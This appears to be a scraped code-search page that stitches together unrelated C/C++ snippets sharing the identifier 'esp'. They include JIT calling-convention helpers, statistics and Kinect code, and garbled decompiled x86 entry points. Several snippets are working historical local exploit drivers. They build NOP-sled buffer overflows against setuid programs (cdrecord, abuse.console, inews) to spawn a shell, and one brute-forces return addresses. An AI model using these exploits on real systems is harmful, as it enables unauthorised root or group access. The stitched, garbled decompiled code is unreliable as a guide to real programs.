예제 #1
unsigned Processor::call_thiscall_args(Register* obj, const char* args, va_list ap) {
	std::stack<Argument> arg_stack;
	std::unordered_set<unsigned char> used_regs;
	Register esp(*this, ESP, sizeof(void*) * 8);

	unsigned argCount = 0, floatCount = 0, intCount = 0, regCount = 0, stackBytes = 0;

	//Set the object as first argument
	if(obj) {
		if(!isIntArg64Register(intCount, argCount))
			stackBytes += pushSize();
		++argCount;
		++intCount;
		arg_stack.push(obj);
	}

	//Read the arguments in...
	while(args && *args != '\0') {
		if(*args == 'r') {
			Register* reg = va_arg(ap,Register*);
			if(reg->xmm()) {
				if(!isFloatArg64Register(floatCount, argCount))
					stackBytes += pushSize();
				++floatCount;
			}
			else {
				if(!isIntArg64Register(intCount, argCount))
					stackBytes += pushSize();
				++intCount;
			}
			++regCount;
			arg_stack.push(reg);
		}
		else if(*args == 'm') {
예제 #2
__entry_point__()
{



    ecx = ecx & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173;
    eax = eax + ecx;
    ecx = ecx + edx;
    (save)0;
    *__imp__GetModuleHandleA();
    asm("Unknown opcode 0x0f");
    asm("Unknown opcode 0xc6");
    asm("hlt");
    edx = esp;
    for((save)149630669; 1; eax = eax - 149630660) {
        (restore)eax;
    }
    (save)edx;
    (save)eax;
    asm("rol dword [esp],0x5");
    (restore)edx;
    asm("bswap edx");
    *esp = *esp + edx + -1476385172;
    *esp();
    asm("adc eax,+0x35");
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *__imp__GetModuleHandleA();
    (save)0;
    *L20402008();
}
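/*
 * Historical proof-of-concept (FreeBSD 3.3-RELEASE era): builds an oversized
 * "dev=" argument for cdrecord whose aligned 4-byte words all hold a guessed
 * return address, and puts a NOP sled plus the payload `devilspawn` into the
 * EGG environment variable. LENGTH, EGGIE, devilspawn and esp() are defined
 * elsewhere in this file. argv[1] is the offset added to esp() for the
 * return-address guess. Returns 1 on a usage error or a failed exec.
 */
int main(int argc, char *argv[])
{
   long addr;
   char buf[LENGTH];
   char egg[EGGIE];
   int i, offset;

   printf("cdrecord exploit by sectorx (FreeBSD)\n");
   if (argc < 2) {
      printf("error: offset must be supplied as a parameter\n");
      printf("*note* FreeBSD 3.3-RELEASE\'s offset is 600\n\n");
      return 1;                      /* was a bare `return;` in an int main */
   }
   if (strlen(devilspawn) + 1 > EGGIE) {
      /* the egg offset below would otherwise wrap below the array */
      printf("error: payload does not fit in the egg buffer\n");
      return 1;
   }
   offset = atoi(argv[1]);
   addr = esp() + offset;
   /* addr is a long, so %lx rather than %x */
   printf("Using offset 0x%x [%d], eip = 0x%lx\n", offset, offset, addr);

   /* build the overflow string: every whole word gets the address; the loop
    * bound keeps the last store inside buf even when LENGTH is not a
    * multiple of sizeof(long) (the original assumed a 32-bit long) */
   for (i = 0; i + (int)sizeof(long) <= LENGTH; i += 4)
      *(long *)&buf[i] = addr;
   buf[LENGTH - 1] = '\0';

   /* build the egg: NOP sled, payload at the very end, NUL terminated */
   memset(egg, 0x90, sizeof(egg));
   memcpy(egg + (EGGIE - strlen(devilspawn) - 1), devilspawn, strlen(devilspawn));
   egg[EGGIE - 1] = '\0';

   setenv("EGG", egg, 1);
   /* execl() is variadic: the terminator must be a null pointer, not int 0 */
   execl("/usr/local/bin/cdrecord", "cdrecord-bin", "dev=", buf, "/etc/fstab", (char *)0);
   perror("execl");                   /* only reached when the exec failed */
   return 1;
}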
예제 #4
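/*
 * Brute-force the return address: fork a child per candidate and let it run
 * exploit() with that address, stepping `offset` bytes at a time upward from
 * esp() until +3000, then downward from esp() until -3000. Refuses to run
 * with uid 0. exploit() and esp() are defined elsewhere in this file.
 *
 * NOTE(review): the parent's uid never changes when a child succeeds, so the
 * getuid() test in the loop cannot stop the sweep early; presumably the user
 * interrupts it once a shell appears.
 */
void bruteforce(char **path)
{
  pid_t pid;
  int x = 0, offset = 5;
  long ret;

  printf("attemping brute force\n\n");

  if (!getuid())
  {
    printf("brute force cannot be run while uid is 0\n");
    exit(0);
  }
  ret = esp() + offset;
  while (getuid() && (x <= 3000 && x >= -3000))
  {
    pid = fork();
    if (pid == 0)
    {
      exploit(ret, path);
      exit(0);
    }
    if (pid < 0)
    {
      /* the original printed "fork failed" after every *successful* fork
       * and then called waitpid(-1); only report a real failure, and do not
       * wait for a child that was never created */
      perror("fork failed");
    }
    else if (waitpid(pid, NULL, 0) != pid)
    {
      perror("waitpid error");
    }

    if (x >= 3000)
    {
      /* upward sweep exhausted: restart downward from esp() */
      ret = esp();
      x = -1;
    }
    else if (x >= 0)
    {
      ret += offset;
      x += offset;
    }
    else
    {
      ret -= offset;
      x -= offset;
    }
    printf("%d\n\n", x);
  }
  printf("brute force complete..\n\n");
  system("id");
}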
예제 #5
/*
 * Walk the global `tab` until the entry whose `believe` pointer is NULL,
 * printing each entry's label, expected value (esp) and variance (var).
 */
void		run()
{
  int		k = 0;

  while (tab[k].believe != NULL)
    {
      printf("f(x) = %s\n", tab[k].info);
      printf("E(x) = %.3f\n", esp(tab[k].believe, tab[k].failboat, tab[k].wincopter));
      printf("Var(x) = %.3f\n\n", var(tab[k].believe, tab[k].failboat, tab[k].wincopter));
      k++;
    }
}
예제 #6
// After a cdecl call: pop the argument bytes plus whatever padding
// call_cdecl_prep added to keep (stackDepth + argBytes) 16-byte aligned.
// On non-MSVC targets a call that returns through a hidden pointer pops
// four bytes fewer — presumably because the callee removes that slot
// itself; confirm against the target calling convention.
void Processor::call_cdecl_end(unsigned argBytes, bool returnPointer) {
	Register esp(*this, ESP, sizeof(void*) * 8);
	const unsigned misalign = (stackDepth + argBytes) % 16;
	unsigned toPop = argBytes;
	if(misalign)
		toPop += 16 - misalign;
#ifndef _MSC_VER
	if(returnPointer)
		toPop -= 4;
#endif
	if(toPop)
		esp += toPop;
}
예제 #7
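/*
 * Historical proof-of-concept: prints a buffer made of a NOP sled, a guessed
 * return address at offset 1005 and the payload `shell` at the end, followed
 * by "sh -i". BUFFSIZE, shell and esp() are defined elsewhere in this file;
 * BUFFSIZE must not exceed 4096. argv[1] is the offset added to esp().
 */
int main(int argc, char **argv)
{
  int i, j, offset;
  unsigned long eip;
  char buffer[4096];

  if (argc < 2) {
    /* argv[1] was dereferenced unconditionally in the original */
    printf("usage: %s <offset>\n", argv[0]);
    return 1;
  }
  j = 0;
  offset = atoi(argv[1]);
  eip = esp() + offset;
  for (i = 0; i < 1008; i++) buffer[i] = 0x90;
  for (i = (BUFFSIZE - strlen(shell)); i < BUFFSIZE; i++) buffer[i] = shell[j++];

  /* little-endian return address at a fixed position inside the sled */
  i = 1005;
  buffer[i]     = eip & 0xff;
  buffer[i + 1] = (eip >> 8) & 0xff;
  buffer[i + 2] = (eip >> 16) & 0xff;
  buffer[i + 3] = (eip >> 24) & 0xff;

  /* nothing NUL-terminates buffer, so bound the print to BUFFSIZE bytes
   * instead of letting %s read past the payload */
  printf("%.*s\nsh -i\n", (int)BUFFSIZE, buffer);
  return 0;
}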
예제 #8
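/*
 * Historical proof-of-concept against abuse.console's "-net" argument:
 * fills an LEN-byte string with a repeated return address, overlays a NOP
 * sled and the payload `shellcode`, and runs the program through system().
 * LEN, RET, NOP, shellcode and esp() are defined elsewhere in this file.
 * argv[1], when given, is subtracted from esp() to guess the return
 * address; otherwise the hard-coded RET is used.
 */
int main(int argc, char *argv[])
{
	char cmd[1000];
	int i;
	long retn;
	char buff[LEN];

	printf("\nUsage :- %s <offset>\n..", argv[0]);

	if (argc > 1)
		retn = esp() - atoi(argv[1]);
	else
		retn = RET;

	/* the original passed retn with no conversion in the format string */
	printf("Using return Adress :- 0x%lx\n", retn);

	if (strlen(shellcode) + 8 > (size_t)LEN) {
		/* the sled length below would otherwise wrap to a huge unsigned value */
		puts("payload does not fit in the buffer");
		return 1;
	}

	/* whole words only, so the last store stays inside buff when LEN is not
	 * a multiple of the word size */
	for (i = 0; i + (int)sizeof(long) <= LEN; i += 4)
		*(long *)&buff[i] = retn;

	for (i = 0; i < (LEN - (strlen(shellcode) + 8)); i++)
		*(buff + i) = NOP;

	memcpy(buff + i, shellcode, strlen(shellcode));

	/* buff is never NUL-terminated: bound the read (%.*s) and the write into
	 * cmd[1000] (snprintf) instead of trusting both to stop in time */
	snprintf(cmd, sizeof(cmd), "/usr/lib/games/abuse/abuse.console -net %.*s", (int)LEN, buff);

	puts("executing .......");

	system(cmd);

	return 0;
}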
예제 #9
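/*
 * Historical proof-of-concept against inews: writes a temporary article
 * whose "From:" header is a 600-byte overflow string (return address
 * repeated from ALIGN on, a NOP sled, then the payload `exec` with its byte
 * at index 10 patched to the target gid) and runs inews on it. NEWSGID,
 * DEFAULT_OFFSET, ALIGN, TMPFILE, NEWSGROUP, SUBJECT, PATH, exec and esp()
 * are defined elsewhere in this file. argv[1] optionally overrides the
 * offset subtracted from esp().
 */
int main(int argc, char **argv){
 char bof[600];			/* give or take a few. (528) */
 int i, n, offset, gid = NEWSGID;
 long ret;
 FILE *inewsfile;

 if (argc > 1) { offset = atoi(argv[1]); }
 else { offset = DEFAULT_OFFSET; }
 ret = (esp() - offset);

 if (strlen(exec) + 100 > sizeof(bof)) {
  /* the sled length below would otherwise wrap to a huge unsigned value */
  printf("%s: payload too large\n", argv[0]);
  exit(-1);
 }
 /* whole words only: with `i < 600` the last store could run past bof */
 for (i = ALIGN; i + (int)sizeof(long) <= (int)sizeof(bof); i += 4) { *(long *)&bof[i] = ret; }
 exec[10] = gid;			/* only the low byte of gid survives; presumably by design */
 for (i = 0; i < (600 - strlen(exec) - 100); i++) { *(bof + i) = 0x90; }
 memcpy(bof + i, exec, strlen(exec));

 unlink(TMPFILE);			/* clean house. */
 inewsfile = fopen(TMPFILE, "w");
 if (inewsfile == NULL) {
  /* the original wrote through the NULL handle on failure */
  perror("fopen");
  exit(-1);
 }
 /* bof is not guaranteed to be NUL-terminated, so bound the read */
 fprintf(inewsfile, "From: %.*s\n", (int)sizeof(bof), bof);		/* required, woops. */
 fprintf(inewsfile, "Newsgroups: %s\n", NEWSGROUP);			/* required. */
 fprintf(inewsfile, "Subject: %s\n\n", SUBJECT);			/* required. */
 fclose(inewsfile);
 /* bounded strlen for the report line, for the same reason */
 for (n = 0; n < (int)sizeof(bof) && bof[n] != '\0'; n++) ;
 printf("[ return address: 0x%lx, offset: %d, actual size: %d(sc=%d). ]\n", ret, offset, n, (int)strlen(exec));
 /* execlp() is variadic: the terminator must be a null pointer, not int 0 */
 if (execlp(PATH, "inews", "-h", TMPFILE, (char *)0)) {
  printf("%s: failed, is %s the correct path?\n", argv[0], PATH);
  exit(-1);
 }
 return 0;
}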
예제 #10
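/*
 * Option parser for the exploit driver. target[] (with .ret and .path),
 * exploit(), bruteforce(), usage() and esp() are defined elsewhere.
 *   -t N    run exploit() against target N's stored return address
 *   -b ARG  brute-force the return address for the target chosen by -t
 *           (the optstring declares an argument for -b, but it is unused)
 *   -o OFF  run exploit() at esp()+OFF against the target chosen by -t
 */
int main(int argc, char **argv)
{
int cnt, sel = 0;		/* 1-based target index; 0 = no -t seen yet */
int offset;			/* was declared char* and assigned from atoi() */
long returnaddr;

if (argc == 1)
{
  usage(argv);			/* the original cast argv[0] to char** here */
  exit(1);
}

/* getopt() reports the end of options as -1 */
while ((cnt = getopt(argc, argv, "t:b:o:")) != -1)
  {
     switch (cnt)
     {
      case 't': /* target distro */
         sel = atoi(optarg);
         if (sel < 1) { usage(argv); exit(1); }	/* target[-1] otherwise; no upper bound is known here */
         exploit(target[sel-1].ret, (char **)target[sel-1].path);
         break;
      case 'b': /* brute force */
         if (sel < 1) { usage(argv); exit(1); }	/* sel was read uninitialised in the original */
         bruteforce((char **)target[sel-1].path);
         break;
      case 'o': /* offset */
         offset = atoi(optarg);
         returnaddr = esp() + offset;
         /* the original overwrote sel with the offset here and then used it
          * to index target[]; keep the target selected by -t instead */
         if (sel < 1) { usage(argv); exit(1); }
         exploit(returnaddr, (char **)target[sel-1].path);
         break;
      default:
         usage(argv);
         break;
     }
  }
  return 0;
}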
예제 #11
/*
 * Variance of `believe` on [ko, ok] around the mean returned by esp(),
 * computed with a composite Simpson rule over ITER sub-intervals: interior
 * nodes weighted 2, sub-interval midpoints weighted 4, endpoints weighted 1,
 * scaled by (ok - ko) / (6 * ITER). esp() and ITER are defined elsewhere.
 */
double		var(double (*believe)(), double ko, double ok)
{
  double	mean;
  double	step;
  double	node_sum;	/* interior nodes, weight 2 */
  double	mid_sum;	/* midpoints, weight 4 */
  double	k;
  double	x;
  double	d;

  mean = esp(believe, ko, ok);
  step = (double)((double)(ok - ko) / (double)ITER);

  node_sum = 0.f;
  for (k = 1.f; k <= (ITER - 1.f); k += 1.f)
    {
      x = ko + k * step;
      d = x - mean;
      node_sum += (d * d) * believe(x);
    }
  node_sum *= 2.f;

  mid_sum = 0.f;
  for (k = 0.f; k <= (ITER - 1.f); k += 1.f)
    {
      x = ko + k * step + step / 2.f;
      d = x - mean;
      mid_sum += (d * d) * believe(x);
    }
  mid_sum *= 4.f;

  return (((double)(ok - ko) / (6.f * ITER)) * ((ko - mean) * believe(ko) + (ok - mean) * believe(ok) + node_sum + mid_sum));
}
예제 #12
__entry_point__()
{



    eax = eax + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx;
    edx = *esp;
    asm("Unknown opcode 0x0f");
    asm("Unknown opcode 0xc6");
    asm("hlt");
    for(eax = 132853453; 1; eax = eax - 132853450) {
    }
    (save)eax;
    *esp = *esp - 2;
    (restore)eax;
    asm("bswap eax");
    (save)eax;
    *esp = *esp + -50321797;
    *esp = *esp + edx;
    asm("adc edx,+0x19");
    eax = *esp() - 21;
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    *__imp__GetVersion();
    ecx = ecx + 1;
}
예제 #13
// Before a cdecl call: if pushing argBytes on top of the current stackDepth
// would leave the stack misaligned from 16 bytes, move ESP down by the
// padding needed so it is aligned at the call. call_cdecl_end pops the same
// padding again afterwards.
void Processor::call_cdecl_prep(unsigned argBytes) {
	const unsigned misalign = (stackDepth + argBytes) % 16;
	Register esp(*this, ESP, sizeof(void*) * 8);
	if(misalign == 0)
		return;
	esp -= 16 - misalign;
}
예제 #14
L00411768()
{



    asm("aam 0xf0");
    *eax = *eax + 1;
    cl = 226;
    *eax = *eax + 1;
    ss = esp;
    *eax = *eax + 1;
    -1 = esi * eax;
    *(eax - 72) = *(eax - 72) + 226;
    *eax = *eax + 1;
    eax = eax & 65450;
    *edi = al;
    edi = edi + 1;
    *eax = *eax + 1;
    *(edx + 2046820572) = *(edx + 2046820572) + dl;
    ecx = -1771962368;
    *eax = *eax + al;
    if(!(edx = edx - 1)) {
    }
    *edx = *edx + dh;
    (save)eax;
    ah = ah + dl;
    asm("jecxz 0x41179a");
    *(ecx + -1912537145) = *(ecx + -1912537145) + dh;
    *edi = eax;
    edi = edi + 4;
    *eax = *eax + 1;
    -1 = *(edi + 1934098687) * ecx;
    *L0000FF57 = *L0000FF57 + ah;
    (save)ebp;
    *eax = *eax + 1;
    *(ecx - 36) = *(ecx - 36) + cl;
    *eax = *eax + al;
    eax :: 822083769;
    asm("xchg eax,esi");
    *eax = *eax + al;
    (save)eax;
    ah = (eax & 419430515) + dl;
    asm("aam 0xff");
    *(ecx + -1912537167) = *(ecx + -1912537167) + dh;
    asm("Unknown opcode 0x8e");
    *eax = *eax + 1;
    0 = *(ebx - 1) * ebp;
    eax = eax - 1 - 1;
    *eax = *eax + 1;
    eax = eax & 65317;
    bh = bh + bh;
    *eax = *eax + al;
    ah = ah + bl;
    *eax = *eax + al;
    *(ecx + -1778384896) = *(ecx + -1778384896) + bh;
    *eax = *eax + al;
    *ebx = *ebx + dh;
    *eax = *eax + al;
    (save)eax;
    bl = bl + ah;
    asm("aam 0xff");
    bh = bh + al;
    *(ebx + -1895759986) = *(ebx + -1895759986) + 255;
    if(!(0 = edi * edi)) {
        *eax = *eax + 1;
        (save)edi;
        eax = eax & 5570815;
        *eax = *eax + 1;
        ah = ah + bl;
        *L3100B900 = *L3100B900 + bh;
        *(esi + 1929389312) = *(esi + 1929389312) + dl;
        *L000000FE = *L000000FE + bl;
        *eax = *eax + dl;
        asm("lock aam 0xff");
        dl = dl + ah;
        cl = 255;
        ah = ah + dl;
        asm("Unknown opcode 0x8e");
        *eax = *eax + 1;
        asm("Unknown opcode 0xc6");
        0 = edi * edi;
        eax = 72;
        *L00000048 = *L00000048 + 1;
        asm("xchg eax,edx");
        ah = ah + bl;
        *edx = *edx + bh;
    }
    if(!( *edx = *edx + -1778359808)) {
    }
    al = al ^ *eax;
    (save)eax;
    bh = bh + bh;
    asm("aam 0xff");
    bh = bh + bh;
    cl = 255;
    bh = bh + bh;
    asm("Unknown opcode 0x8e");
    *eax = *eax + 1;
    goto ( *(ebx - 1));
    bh = bh + bh;
    eax = eax - 1;
    *eax = *eax + 1;
    goto ( *L00ff00ff);
    *eax = *eax + 1;
    (fsave)(frestore) + *eax + *eax;
    ecx = -1778337536;
    *(esi + 1929409280) = *(esi + 1929409280) + dl;
    *eax = *eax + dl;
    (save)eax;
    bh = bh + bh;
    asm("aam 0xf0");
    bh = bh + bh;
    ss = esp;
    0 = esi * eax;
    *(eax - 72) = *(eax - 72) - 1;
    bh = bh + bh + bh + bh + bh + bh + bh + bh;
    *edi = eax & 16711850;
    edi = edi + 1;
    ah = ah + bl;
    *(edx + 2046867712) = *(edx + 2046867712) + dl;
    *(esi + 1929404928) = *(esi + 1929404928) + dl;
    *edx = *edx + 226;
    (save)eax;
    *edx = *edx + dh;
    bh = bh + bh;
    asm("aam 0xe3");
    bh = bh + bh;
    cl = 199;
    gs = *(bh + bh + -1888747776);
    bh = bh + bh + bh + bh;
    if(!(eax = eax - 1)) {
    }
    goto ( *L00ff0057);
    (save)ebp;
    ah = ah + bl;
    *ecx = *ecx + cl;
    *L96003D00 = *L96003D00 + dh;
    *ebx = *ebx + dh;
    eax = eax & 419450880;
    bh = bh + bh;
    asm("aam 0xd4");
    bh = bh + bh;
    cl = 177;
    bh = bh + bh;
    asm("Unknown opcode 0x8e");
    es = *eax;
    goto ( *(ebx + 107));
    bh = bh + bh;
    eax = eax - 1 - 1;
    bh = bh + bh;
    eax = eax & 16711717;
    *eax = *eax + al;
    (fsave)(frestore) + *eax;
    *eax = *eax + al;
    ecx = -1778384896;
    *eax = *eax + al;
    *ebx = *ebx + dh;
    *eax = *eax + al;
    (save)eax;
    *eax = *eax + al;
    bh = bh + bh;
    asm("jecxz 0x4118ef");
    bh = bh + bh;
    asm("Unknown opcode 0xc7");
    cl = 0;
    goto ( *(ebx + -1879113586));
    if(!(-1 = *eax * eax)) {
        bh = bh + bh;
        (save)edi;
        ah = (eax & 5635840) + bl;
        ecx = ecx - 1;
        *eax = *eax + al;
        ecx = -1778384835;
        *eax = *eax ^ eax;
        *(ebx + 37) = *(ebx + 37) + dh;
        *eax = *eax + al;
        (save)eax;
        asm("sbb [eax],eax");
        bh = bh + bh;
        asm("lock aam 0x0");
        goto ( *edx);
        cl = 0;
        eax = *esp();
        es = *eax;
        esi = esi + 1;
        -1 = *eax * eax;
        ah = 11141120 + bl;
        asm("xchg eax,edx");
        *eax = *eax + al;
        ecx = -1778384774;
        asm("bound eax,[eax]");
        *(ebx + 74) = *(ebx + 74) + dh;
        *eax = *eax + al;
    }
예제 #15
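// Grab one depth + RGB frame from the OpenNI generators, wrap it in an
// RgbdKinect and hand it to SEND. Always returns a default-constructed esp;
// `frame` is not used. The metadata is read before WaitAndUpdateAll(), so
// the data shipped is whatever the previous update left in the generators
// (presumably intentional — confirm against the caller's timing).
esp KinectOpenNI::get(const base::timestamp frame)
{
   if(!_connected)
   {
        return esp();
   }
 //  QMutexLocker locker(&_mutex);
   // NOTE(review): nothing locks here; callers must serialise access to the
   // shared g_* generators and metadata objects.

   g_depth.GetMetaData(g_depthMD);
   g_image.GetMetaData(g_imageMD);

   // The Mats are created at a fixed 640x480 and filled by fixed-size
   // memcpy()s, so the source maps must really have that size and format.
   // The original only assert()ed this; under NDEBUG the asserts vanish and
   // a smaller map would be read past its end. Check at runtime and skip
   // the frame instead.
   const bool depthOk = g_depthMD.XRes() == 640 && g_depthMD.YRes() == 480;
   const bool imageOk = g_imageMD.PixelFormat() == XN_PIXEL_FORMAT_RGB24
                     && g_imageMD.XRes() == 640 && g_imageMD.YRes() == 480;
   if(depthOk && imageOk)
   {
        const XnDepthPixel* pDepth = g_depth.GetDepthMap();
        cv::Mat depth(480, 640, CV_16UC1);
        memcpy(depth.data, pDepth, 640 * 480 * sizeof(XnDepthPixel));

        const XnUInt8* pImage = g_imageMD.Data();
        cv::Mat rgb(480, 640, CV_8UC3);
        memcpy(rgb.data, pImage, 640 * 480 * 3);   // RGB24: three bytes per pixel

        // Zero-initialised so a failed property query (the return codes are
        // not checked, as in the original) leaves 0 rather than stack garbage.
        XnUInt64 F = 0;            // focal length in mm ("ZPD" = zero plane distance)
        XnDouble pixel_size = 0;   // pixel size in mm at the zero plane ("ZPPS")
        g_depth.GetIntProperty("ZPD", F);
        g_depth.GetRealProperty("ZPPS", pixel_size);

        // kf is presumably owned by the receiver once SEND has run — confirm
        // against the macro before changing this to a smart pointer.
        RgbdKinect *kf = new RgbdKinect(pixel_size, F, _serial, rgb, depth, cv::Point3d(0,0,0));
        SEND(types::Rgbd,kf)
   }
   // (An earlier, commented-out variant also produced a point cloud via
   // retrievePointCloudMap()/retrievePointCloudAsImage(); dropped as dead code.)

   //xnWaitNoneUpdateAll
 //  g_context.WaitNoneUpdateAll();
   // Advance the generators even when this frame was rejected, so a later
   // call sees fresh metadata.
   g_context.WaitAndUpdateAll();
   return esp();
}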